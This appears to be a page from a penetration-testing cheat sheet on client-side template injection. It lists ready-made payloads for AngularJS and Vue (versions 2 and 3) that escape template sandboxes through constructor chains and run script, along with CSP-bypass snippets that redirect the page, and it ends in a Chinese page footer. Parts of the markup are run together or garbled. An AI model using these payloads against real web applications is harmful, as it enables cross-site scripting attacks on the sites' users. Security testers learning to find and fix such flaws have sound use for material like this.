Client Side Template Injection (CSTI)
AngularJS
{{$on.constructor('alert(1)')()}}{{constructor.constructor('alert(1)')()}}<!-- Google Research - AngularJS --><div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>VueJS
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaadiv>V3
{{_openBlock.constructor('alert(1)')()}}V2
Mavo
最后更新于
这有帮助吗?